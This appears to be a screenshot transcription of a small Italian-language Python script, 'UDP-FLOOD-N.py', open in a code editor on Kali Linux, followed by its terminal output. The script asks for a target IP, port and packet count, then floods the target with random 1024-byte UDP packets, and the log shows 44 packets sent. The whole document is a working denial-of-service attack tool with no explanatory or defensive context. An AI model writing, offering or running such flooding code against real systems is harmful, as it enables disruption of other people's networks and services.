



```
home > kali > UDP-FLOOD-N.py > ...
1  import socket
2  import random
3
4  ip_target = input("Inserisci l'IP target: ")
5  target_porta = int(input("Inserisci la porta target: "))
6
7  packet_count = int(input("Inserisci il numero di pacchetti da inviare: "))
8  sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
9
10 packet_size = 1024
11 payload = bytes([random.randint(0, 255) for _ in range(packet_size)])
12
13 print(f"Attacco UDP flood verso {ip_target}:{target_porta} con pacchetti di {packet_size} byte.")
14
15 for i in range(packet_count):
16     sock.sendto(payload, (ip_target, target_porta))
17     print(f"Inviato pacchetto {i + 1} di {packet_count}")
18
19 print("E' la fine")
20
```

PROBLEMS OUTPUT DEBUG CONSOLE TERMINAL PORTS

Inviato pacchetto 20 di 44
Inviato pacchetto 21 di 44
Inviato pacchetto 22 di 44
Inviato pacchetto 23 di 44
Inviato pacchetto 24 di 44
Inviato pacchetto 25 di 44
Inviato pacchetto 26 di 44
Inviato pacchetto 27 di 44
Inviato pacchetto 28 di 44
Inviato pacchetto 29 di 44
Inviato pacchetto 30 di 44
Inviato pacchetto 31 di 44
Inviato pacchetto 32 di 44
Inviato pacchetto 33 di 44
Inviato pacchetto 34 di 44
Inviato pacchetto 35 di 44
Inviato pacchetto 36 di 44
Inviato pacchetto 37 di 44
Inviato pacchetto 38 di 44
Inviato pacchetto 39 di 44
Inviato pacchetto 40 di 44
Inviato pacchetto 41 di 44
Inviato pacchetto 42 di 44
Inviato pacchetto 43 di 44
Inviato pacchetto 44 di 44
E' la fine